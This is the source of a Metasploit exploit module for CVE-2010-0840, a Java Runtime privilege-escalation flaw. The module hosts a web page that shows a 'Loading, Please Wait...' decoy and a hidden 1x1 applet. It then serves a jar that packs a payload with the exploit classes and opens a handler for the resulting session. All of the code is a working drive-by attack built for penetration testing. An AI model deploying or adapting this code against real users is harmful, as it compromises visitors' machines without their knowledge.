1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Remote
7
  Rank = ExcellentRanking
8

9
  include Msf::Exploit::Remote::HttpServer::HTML
10

11
  # Superceded by java_atomicreferencearray
12
  # include Msf::Exploit::Remote::BrowserAutopwn
13
  # autopwn_info({ :javascript => false })
14

15
  def initialize(info = {})
16
    super(
17
      update_info(
18
        info,
19
        'Name' => 'Java Statement.invoke() Trusted Method Chain Privilege Escalation',
20
        'Description' => %q{
21
          This module exploits a vulnerability in Java Runtime Environment
22
          that allows an untrusted method to run in a privileged context.  The
23
          vulnerability affects version 6 prior to update 19 and version 5
24
          prior to update 23.
25
        },
26
        'License' => MSF_LICENSE,
27
        'Author' => [
28
          'Sami Koivu', # Discovery
29
          'Matthias Kaiser', # PoC
30
          'egypt' # metasploit module
31
        ],
32
        'References' => [
33
          [ 'CVE', '2010-0840' ],
34
          [ 'OSVDB', '63483' ],
35
          [ 'URL', 'http://slightlyrandombrokenthoughts.blogspot.com/2010/04/java-trusted-method-chaining-cve-2010.html' ],
36
        ],
37
        'Platform' => %w{java linux win},
38
        'Payload' => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true },
39
        'Targets' => [
40
          [
41
            'Generic (Java Payload)',
42
            {
43
              'Arch' => ARCH_JAVA,
44
            }
45
          ],
46
          [
47
            'Windows Universal',
48
            {
49
              'Arch' => ARCH_X86,
50
              'Platform' => 'win'
51
            }
52
          ],
53
          [
54
            'Linux x86',
55
            {
56
              'Arch' => ARCH_X86,
57
              'Platform' => 'linux'
58
            }
59
          ]
60
        ],
61
        'DefaultTarget' => 0,
62
        'DisclosureDate' => '2010-03-31',
63
        'Notes' => {
64
          'Reliability' => UNKNOWN_RELIABILITY,
65
          'Stability' => UNKNOWN_STABILITY,
66
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
67
        }
68
      )
69
    )
70
  end
71

72
  def on_request_uri(cli, request)
73
    if not request.uri.match(/\.jar$/i)
74
      if not request.uri.match(/\/$/)
75
        send_redirect(cli, get_resource() + '/', '')
76
        return
77
      end
78

79
      print_status("#{self.name} handling request")
80

81
      send_response_html(cli, generate_html, { 'Content-Type' => 'text/html' })
82
      return
83
    end
84

85
    paths = [
86
      [ "vuln", "Exploit.class" ],
87
      [ "vuln", "Exploit$1.class" ],
88
      [ "vuln", "Link.class" ],
89
    ]
90

91
    p = regenerate_payload(cli)
92

93
    jar = p.encoded_jar
94
    paths.each do |path|
95
      1.upto(path.length - 1) do |idx|
96
        full = path[0, idx].join("/") + "/"
97
        if !(jar.entries.map { |e| e.name }.include?(full))
98
          jar.add_file(full, '')
99
        end
100
      end
101
      fd = File.open(File.join(Msf::Config.data_directory, "exploits", "cve-2010-0840", path), "rb")
102
      data = fd.read(fd.stat.size)
103
      jar.add_file(path.join("/"), data)
104
      fd.close
105
    end
106

107
    print_status("Sending Applet.jar")
108
    send_response(cli, jar.pack, { 'Content-Type' => "application/octet-stream" })
109

110
    handler(cli)
111
  end
112

113
  def generate_html
114
    html = "<html><head><title>Loading, Please Wait...</title></head>"
115
    html += "<body><center><p>Loading, Please Wait...</p></center>"
116
    html += "<applet archive=\"Exploit.jar\" code=\"vuln.Exploit.class\" width=\"1\" height=\"1\">"
117
    html += "</applet></body></html>"
118
    return html
119
  end
120
end
121

122